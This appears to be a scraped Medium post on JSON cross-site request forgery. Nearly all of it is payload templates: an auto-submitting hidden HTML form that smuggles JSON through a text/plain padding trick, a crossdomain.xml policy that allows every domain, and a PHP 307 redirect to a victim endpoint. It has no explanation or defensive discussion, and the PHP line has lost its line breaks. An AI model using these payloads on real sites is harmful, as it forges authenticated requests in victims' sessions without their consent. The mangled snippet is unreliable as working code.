JSON CSRF : CSRF that none talks about

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://site url" method="POST" enctype="text/plain">
<input type="hidden"
name='{<json data>,"padding":"'value='something"}' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
<?php// redirect automaticallyheader("Location: https://victim.com/user/endpoint/", true, 307);?>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store